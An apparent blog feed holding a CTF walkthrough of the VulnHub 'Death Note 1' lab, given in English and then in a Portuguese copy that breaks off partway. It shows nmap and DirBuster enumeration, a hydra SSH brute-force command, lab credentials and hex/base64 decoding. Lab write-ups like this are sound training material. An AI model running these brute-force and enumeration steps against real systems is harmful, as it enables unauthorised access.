r3d/ops — Blog Red Team KBM SecurityTutoriais de segurança ofensiva, scripts e playbooks para operações red team autorizadas.https://www.kbmsecurity.com.br/pt-br© 2026 KBM SecurityDeath Note 1 — Complete VulnHub Walkthroughhttps://www.kbmsecurity.com.br/blog/post/deathnote-en/https://www.kbmsecurity.com.br/blog/post/deathnote-en/Walkthrough of the Death Note 1 VulnHub machine: reconnaissance, SSH brute-force with Hydra, hex/base64 decoding, and capturing root.txt.Sat, 21 Feb 2026 00:00:00 GMT<h2 id="1-introduction">1. Introduction</h2> <p>The <strong>Death Note 1</strong> machine is available on <a href="https://www.vulnhub.com/entry/deathnote-1,739/">VulnHub</a> and is classified as <strong>Easy</strong>. The goal is to compromise the server, escalating from web access to reading the <code>root.txt</code> file. The theme is inspired by the anime <em>Death Note</em>, with users such as <strong>kira</strong>, <strong>L</strong>, and <strong>Misa</strong> distributed throughout the machine.</p> <p>The environment used in this walkthrough is a local network with the target machine at <code>192.168.3.152</code> and the attacking machine running <strong>Kali Linux</strong>.</p> <hr> <h2 id="2-reconnaissance">2. Reconnaissance</h2> <h3 id="21-host-discovery">2.1 Host Discovery</h3> <p>We use <code>netdiscover</code> to map the active hosts on the <code>/16</code> network and identify the IP of the target machine.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">netdiscover</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> 192.168.0.0/16</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Currently scanning: 192.168.0.0/16 | Screen View: Unique Hosts</span></span> <span class="line"><span>4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240</span></span> <span class="line"><span></span></span> <span class="line"><span>IP At MAC Address Count Len MAC Vendor / Hostname</span></span> <span class="line"><span>192.168.0.1 d8:07:b6:96:bf:c8 1 60 TP-LINK TECHNOLOGIES CO.,LTD.</span></span> <span class="line"><span>192.168.3.1 88:36:cf:5d:f9:e5 1 60 Huawei Device Co., Ltd.</span></span> <span class="line"><span>192.168.3.126 dc:21:5c:76:38:2e 1 60 Intel Corporate</span></span> <span class="line"><span>192.168.3.152 08:00:27:72:d0:cd 1 60 PCS Systemtechnik GmbH ← TARGET</span></span></code></pre> <h3 id="22-port-and-service-scan">2.2 Port and Service Scan</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#D19A66"> -sS</span><span style="color:#D19A66"> -A</span><span style="color:#D19A66"> 192.168.3.152</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>PORT STATE SERVICE VERSION</span></span> <span class="line"><span>22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</span></span> <span class="line"><span>80/tcp open http Apache httpd 2.4.38 ((Debian))</span></span> <span class="line"><span>|_http-title: Site doesn&#x26;#x27;t have a title (text/html)</span></span></code></pre> <p><strong>Two open ports</strong> were identified:</p> <ul> <li><strong>22/TCP</strong> — SSH (OpenSSH 7.9p1)</li> <li><strong>80/TCP</strong> — HTTP (Apache 2.4.38)</li> </ul> <hr> <h2 id="3-web-enumeration">3. Web Enumeration</h2> <h3 id="31-initial-access">3.1 Initial Access</h3> <p>Accessing <code>http://192.168.3.152</code> through the browser, we found a completely unconfigured website. Navigating to the <code>/wordpress/</code> directory, we found a WordPress blog with the user <strong>kira</strong> and the post <em>“i will eliminate you L!”</em>, containing the phrase:</p> <p>> <em>“my fav line is iamjustic3”</em></p> <p>This serves as an important tip for the exploration phase.</p> <h3 id="32-directory-enumeration-with-dirbuster">3.2 Directory Enumeration with DirBuster</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Using OWASP DirBuster 1.0-RC1 against http://192.168.3.152:80/</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># DirBuster default wordlist, 200 threads</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Relevant directories/files found (HTTP 200):</span></span> <span class="line"><span>/wp-content/uploads/2021/07/</span></span> <span class="line"><span>/wp-content/uploads/2021/07/user.txt (359 bytes)</span></span> <span class="line"><span>/wp-content/uploads/2021/07/notes.txt (745 bytes)</span></span> <span class="line"><span>/license.txt</span></span> <span class="line"><span>/robots.txt</span></span> <span class="line"><span>/manual/</span></span></code></pre> <p>Two <code>.txt</code> files were found in the WordPress uploads directory:</p> <ul> <li><strong><code>user.txt</code></strong> — list of possible usernames</li> <li><strong><code>notes.txt</code></strong> — list of possible passwords</li> </ul> <h3 id="33-analysis-of-robotstxt">3.3 Analysis of robots.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> http://192.168.3.152/robots.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>fuck it my dad</span></span> <span class="line"><span>added hint on /important.jpg</span></span> <span class="line"><span></span></span> <span class="line"><span>ryuk please delete it</span></span></code></pre> <p>The <code>robots.txt</code> reveals the existence of the <code>/important.jpg</code> file.</p> <h3 id="34-reading-importantjpg-via-curl">3.4 Reading important.jpg via curl</h3> <p>The <code>important.jpg</code> file was corrupted as an image. Using <code>curl</code>, it was possible to read its text content:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> http://192.168.3.152/important.jpg</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>i am Soichiro Yagami, light&#x26;#x27;s father</span></span> <span class="line"><span>i have a doubt if L is true about the assumption that light is kira</span></span> <span class="line"><span></span></span> <span class="line"><span>i can only help you by giving something important</span></span> <span class="line"><span></span></span> <span class="line"><span>login username : user.txt</span></span> <span class="line"><span>i don&#x26;#x27;t know the password.</span></span> <span class="line"><span>find it by yourself</span></span> <span class="line"><span>but i think it is in the hint section of site</span></span></code></pre> <p>Confirmation: <strong><code>user.txt</code></strong> is the user wordlist and the password is in <strong><code>notes.txt</code></strong>.</p> <hr> <h2 id="4-exploitation">4. Exploitation</h2> <h3 id="41-ssh-brute-force-with-hydra">4.1 SSH Brute Force with Hydra</h3> <p>With the wordlists <code>user.txt</code> and <code>notes.txt</code> in hand, we perform a brute force attack on the SSH service:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">hydra</span><span style="color:#D19A66"> -L</span><span style="color:#98C379"> user.txt</span><span style="color:#D19A66"> -P</span><span style="color:#98C379"> notes.txt</span><span style="color:#D19A66"> 192.168.3.152</span><span style="color:#98C379"> ssh</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43)</span></span> <span class="line"><span>[DATA] attacking ssh://192.168.3.152:22/</span></span> <span class="line"><span>[STATUS] 293.00 tries/min, 293 tries in 00:01h</span></span> <span class="line"><span>[22][ssh] host: 192.168.3.152 login: l password: deathnote</span></span></code></pre> <p>> ✅ <strong>Credentials found: <code>l</code> / <code>deathnote</code></strong></p> <hr> <h2 id="5-initial-access">5. Initial Access</h2> <h3 id="51-ssh-login-as-user-l">5.1 SSH login as user <code>l</code></h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">ssh</span><span style="color:#98C379"> l@192.168.3.152</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>l@192.168.3.152&#x26;#x27;s password: deathnote</span></span> <span class="line"><span></span></span> <span class="line"><span>Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64</span></span> <span class="line"><span></span></span> <span class="line"><span>l@deathnote:~$</span></span></code></pre> <p>Successfully gained access to the target machine’s shell.</p> <hr> <h2 id="6-post-exploitation--escalation">6. Post-Exploitation / Escalation</h2> <h3 id="61-discovery-of-the-optl-directory">6.1 Discovery of the /opt/L Directory</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:~$</span><span style="color:#98C379"> cd</span><span style="color:#98C379"> /opt</span></span> <span class="line"><span style="color:#61AFEF">l@deathnote:/opt$</span><span style="color:#98C379"> ls</span><span style="color:#D19A66"> -l</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>drwxr-xr-x 4 root root 4096 Aug 29 2021 L</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt$</span><span style="color:#98C379"> cd</span><span style="color:#98C379"> L</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -l</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule</span></span> <span class="line"><span>drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case</span></span></code></pre> <h3 id="62-reading-case-filetxt">6.2 Reading case-file.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L$</span><span style="color:#98C379"> cd</span><span style="color:#98C379"> kira-case</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">cat</span><span style="color:#98C379"> case-file.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>the FBI agent died on December 27, 2006</span></span> <span class="line"><span></span></span> <span class="line"><span>1 week after the investigation of the task-force member/head.</span></span> <span class="line"><span>aka.....</span></span> <span class="line"><span>Soichiro Yagami&#x26;#x27;s family.</span></span> <span class="line"><span></span></span> <span class="line"><span>hmmmmmmmmmm......</span></span> <span class="line"><span>and according to Watari,</span></span> <span class="line"><span>he died as others died after Kira targeted them.</span></span> <span class="line"><span></span></span> <span class="line"><span>and we also found something in the fake-notebook-rule folder.</span></span></code></pre> <h3 id="63-hex--base64-decoding-of-casewav">6.3 Hex + Base64 decoding of case.wav</h3> <p>Inside the <code>fake-notebook-rule</code> directory, we found a file <code>case.wav</code> that was unreadable as audio:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L/fake-notebook-rule$</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> case.wav</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>63 47 46 7a 63 33 64 6b 49 44 4f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:/opt/L/fake-notebook-rule$</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> hint</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>use cyberchef</span></span></code></pre> <p>Using <strong>CyberChef</strong> with the recipe <code>From Hex → From Base64</code>:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Input (Hex):</span></span> <span class="line"><span>63 47 46 7a 63 33 64 6b 49 44 4f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d</span></span> <span class="line"><span></span></span> <span class="line"><span>Step 1 — From Hex:</span></span> <span class="line"><span>cGFzc3dkIDoga2lyYWlzZXZpbCA=</span></span> <span class="line"><span></span></span> <span class="line"><span>Step 2 — From Base64:</span></span> <span class="line"><span>passwd : kiraisevil</span></span></code></pre> <p>> ✅ <strong>New credential found: <code>kira</code> / <code>kiraisevil</code></strong></p> <h3 id="64-log-in-as-kira-and-decode-kiratxt">6.4 Log in as kira and decode kira.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Elevating to user kira (or reconnecting via SSH)</span></span> <span class="line"><span style="color:#61AFEF">ssh</span><span style="color:#98C379"> kira@192.168.3.152</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># password: kiraisevil</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">root@deathnote:/home/kira#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> kira.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp</span></span></code></pre> <p>Decoding again via <strong>CyberChef</strong> (<code>From Base64</code>):</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>please protect one of the following</span></span> <span class="line"><span>1. L (/opt)</span></span> <span class="line"><span>2. Misa (/var)</span></span></code></pre> <h3 id="65-discovering-the-misa-file-in-var">6.5 Discovering the Misa file in /var</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">root@deathnote:/var#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> misa</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>it is toooo late for misa</span></span></code></pre> <hr> <h2 id="7-flags--root">7. Flags / Root</h2> <h3 id="71-capturing-roottxt">7.1 Capturing root.txt</h3> <p>Navigating to the root home directory, we locate the <code>root.txt</code> file:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">root@deathnote:/var#</span><span style="color:#98C379"> cd</span></span> <span class="line"><span style="color:#61AFEF">root@deathnote:~#</span><span style="color:#98C379"> ls</span></span> <span class="line"><span style="color:#61AFEF">root.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">root@deathnote:~#</span><span style="color:#98C379"> cat</span><span style="color:#98C379"> root.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>[REDACTED]</span></span> <span class="line"><span></span></span> <span class="line"><span>##########follow me on twitter###########3</span></span> <span class="line"><span>and share this screen shot and tag @KDSAMF</span></span></code></pre> <p>> 🏁 <strong>CTF successfully completed!</strong> The final flag was obtained from the <code>root.txt</code> file in the home directory of the <code>root</code> user.</p> <hr> <h2 id="8-conclusion">8. Conclusion</h2> <p>The <strong>Death Note 1</strong> machine is a great exercise for CTF beginners, following a classic path of compromise:</p> <table><thead><tr><th>Step</th><th>Technique</th><th>Tool</th></tr></thead><tbody><tr><td>Host discovery</td><td>Passive ARP scan</td><td><code>netdiscover</code></td></tr><tr><td>Surface mapping</td><td>Port/service scan</td><td><code>nmap</code></td></tr><tr><td>Web enumeration</td><td>Directory brute-force</td><td><code>DirBuster</code></td></tr><tr><td>Wordlist collection</td><td>Reading exposed files</td><td><code>curl</code></td></tr><tr><td>Initial access</td><td>SSH brute-force</td><td><code>hydra</code></td></tr><tr><td>Post-exploitation</td><td>Hex + Base64 decoding</td><td><code>CyberChef</code></td></tr><tr><td>Lateral escalation</td><td>Credential reuse</td><td><code>ssh</code></td></tr><tr><td>Flag capture</td><td>Root file reading</td><td><code>cat</code></td></tr></tbody></table> <p><strong>Key takeaways:</strong></p> <ul> <li>Files that appear to be “corrupted” may contain useful data—always use <code>curl</code> or <code>cat</code> before discarding them.</li> <li>Wordlists exposed in web directories are a critical attack vector.</li> <li>Multi-layered encoded data (Hex → Base64) is common in easy-level CTFs; tools like CyberChef dramatically speed up analysis.</li> <li>Methodical directory enumeration (<code>/opt</code>, <code>/var</code>) after initial access is essential for finding escalation paths.</li> </ul> <hr> <p><em>Written by <strong>G4ij1ntoor</strong> — <a href="https://kbmsecurity.com">KBM Security</a> · r3d/ops blog</em></p>redteam@kbmsecurity.com.brctfctfvulnhublinuxbrute-forcehydranmapsshweb-enumerationeasyDeath Note 1 — VulnHub Walkthrough Completohttps://www.kbmsecurity.com.br/blog/post/deathnote/https://www.kbmsecurity.com.br/blog/post/deathnote/Walkthrough da máquina Death Note 1 do VulnHub: reconhecimento, brute-force SSH com Hydra, decodificação hex/base64 e captura do root.txt.Sat, 21 Feb 2026 00:00:00 GMT<h2 id="1-introdução">1. Introdução</h2> <p>A máquina <strong>Death Note 1</strong> está disponível no <a href="https://www.vulnhub.com/entry/deathnote-1,739/">VulnHub</a> e é classificada com dificuldade <strong>Fácil</strong>. O objetivo é comprometer o servidor, escalando do acesso web até a leitura do arquivo <code>root.txt</code>. A temática é inspirada no anime <em>Death Note</em>, com usuários como <strong>kira</strong>, <strong>L</strong> e <strong>Misa</strong> distribuídos pela máquina.</p> <p>O ambiente utilizado neste walkthrough é uma rede local com a máquina alvo em <code>192.168.3.152</code> e a máquina atacante rodando <strong>Kali Linux</strong>.</p> <hr> <h2 id="2-reconhecimento">2. Reconhecimento</h2> <h3 id="21-descoberta-de-host">2.1 Descoberta de Host</h3> <p>Utilizamos o <code>netdiscover</code> para mapear os hosts ativos na rede <code>/16</code> e identificar o IP da máquina alvo.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">netdiscover</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> 192.168.0.0/16</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Currently scanning: 192.168.0.0/16 | Screen View: Unique Hosts</span></span> <span class="line"><span>4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240</span></span> <span class="line"><span></span></span> <span class="line"><span>IP At MAC Address Count Len MAC Vendor / Hostname</span></span> <span class="line"><span>192.168.0.1 d8:07:b6:96:bf:c8 1 60 TP-LINK TECHNOLOGIES CO.,LTD.</span></span> <span class="line"><span>192.168.3.1 88:36:cf:5d:f9:e5 1 60 Huawei Device Co., Ltd.</span></span> <span class="line"><span>192.168.3.126 dc:21:5c:76:38:2e 1 60 Intel Corporate</span></span> <span class="line"><span>192.168.3.152 08:00:27:72:d0:cd 1 60 PCS Systemtechnik GmbH ← ALVO</span></span></code></pre> <h3 id="22-scan-de-portas-e-serviços">2.2 Scan de Portas e Serviços</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#D19A66"> -sS</span><span style="color:#D19A66"> -A</span><span style="color:#D19A66"> 192.168.3.152</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>PORT STATE SERVICE VERSION</span></span> <span class="line"><span>22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</span></span> <span class="line"><span>80/tcp open http Apache httpd 2.4.38 ((Debian))</span></span> <span class="line"><span>|_http-title: Site doesn't have a title (text/html)</span></span></code></pre> <p>Foram identificadas <strong>duas portas abertas</strong>:</p> <ul> <li><strong>22/TCP</strong> — SSH (OpenSSH 7.9p1)</li> <li><strong>80/TCP</strong> — HTTP (Apache 2.4.38)</li> </ul> <hr> <h2 id="3-enumeração-web">3. Enumeração Web</h2> <h3 id="31-acesso-inicial">3.1 Acesso Inicial</h3> <p>Acessando <code>http://192.168.3.152</code> pelo navegador, encontramos um site totalmente desconfigurável. Navegando para o diretório <code>/wordpress/</code>, encontramos um blog WordPress com o usuário <strong>kira</strong> e o post <em>“i will eliminate you L!”</em>, contendo a frase:</p> <blockquote> <p><em>“my fav line is iamjustic3”</em></p> </blockquote> <p>Isso serve como dica importante para a fase de exploração.</p> <h3 id="32-enumeração-de-diretórios-com-dirbuster">3.2 Enumeração de Diretórios com DirBuster</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Utilizando OWASP DirBuster 1.0-RC1 contra http://192.168.3.152:80/</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Wordlist padrão do DirBuster, 200 threads</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>Diretórios/Arquivos relevantes encontrados (HTTP 200):</span></span> <span class="line"><span>/wp-content/uploads/2021/07/</span></span> <span class="line"><span>/wp-content/uploads/2021/07/user.txt (359 bytes)</span></span> <span class="line"><span>/wp-content/uploads/2021/07/notes.txt (745 bytes)</span></span> <span class="line"><span>/license.txt</span></span> <span class="line"><span>/robots.txt</span></span> <span class="line"><span>/manual/</span></span></code></pre> <p>Foram encontrados dois arquivos <code>.txt</code> no diretório de uploads do WordPress:</p> <ul> <li><strong><code>user.txt</code></strong> — lista de possíveis nomes de usuário</li> <li><strong><code>notes.txt</code></strong> — lista de possíveis senhas</li> </ul> <h3 id="33-análise-do-robotstxt">3.3 Análise do robots.txt</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> http://192.168.3.152/robots.txt</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>fuck it my dad</span></span> <span class="line"><span>added hint on /important.jpg</span></span> <span class="line"><span></span></span> <span class="line"><span>ryuk please delete it</span></span></code></pre> <p>O <code>robots.txt</code> revela a existência do arquivo <code>/important.jpg</code>.</p> <h3 id="34-leitura-do-importantjpg-via-curl">3.4 Leitura do important.jpg via curl</h3> <p>O arquivo <code>important.jpg</code> estava corrompido como imagem. Usando <code>curl</code>, foi possível ler seu conteúdo de texto:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> http://192.168.3.152/important.jpg</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>i am Soichiro Yagami, light's father</span></span> <span class="line"><span>i have a doubt if L is true about the assumption that light is kira</span></span> <span class="line"><span></span></span> <span class="line"><span>i can only help you by giving something important</span></span> <span class="line"><span></span></span> <span class="line"><span>login username : user.txt</span></span> <span class="line"><span>i don't know the password.</span></span> <span class="line"><span>find it by yourself</span></span> <span class="line"><span>but i think it is in the hint section of site</span></span></code></pre> <p>Confirmação: <strong><code>user.txt</code></strong> é a wordlist de usuários e a senha está em <strong><code>notes.txt</code></strong>.</p> <hr> <h2 id="4-exploração">4. Exploração</h2> <h3 id="41-brute-force-ssh-com-hydra">4.1 Brute-Force SSH com Hydra</h3> <p>Com as wordlists <code>user.txt</code> e <code>notes.txt</code> em mãos, realizamos o ataque de força bruta no serviço SSH:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">hydra</span><span style="color:#D19A66"> -L</span><span style="color:#98C379"> user.txt</span><span style="color:#D19A66"> -P</span><span style="color:#98C379"> notes.txt</span><span style="color:#D19A66"> 192.168.3.152</span><span style="color:#98C379"> ssh</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43)</span></span> <span class="line"><span>[DATA] attacking ssh://192.168.3.152:22/</span></span> <span class="line"><span>[STATUS] 293.00 tries/min, 293 tries in 00:01h</span></span> <span class="line"><span>[22][ssh] host: 192.168.3.152 login: l password: deathnote</span></span></code></pre> <blockquote> <p>✅ <strong>Credenciais encontradas: <code>l</code> / <code>deathnote</code></strong></p> </blockquote> <hr> <h2 id="5-acesso-inicial">5. Acesso Inicial</h2> <h3 id="51-login-ssh-como-usuário-l">5.1 Login SSH como usuário <code>l</code></h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">ssh</span><span style="color:#98C379"> l@192.168.3.152</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="text"><code><span class="line"><span>l@192.168.3.152's password: deathnote</span></span> <span class="line"><span></span></span> <span class="line"><span>Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64</span></span> <span class="line"><span></span></span> <span class="line"><span>l@deathnote:~$</span></span></code></pre> <p>Acesso obtido com sucesso ao shell da máquina alvo.</p> <hr> <h2 id="6-pós-exploração--escalada">6. Pós-Exploração / Escalada</h2> <h3 id="61-descoberta-do-diretório-optl">6.1 Descoberta do Diretório /opt/L</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">l@deathnote:~$</span><span 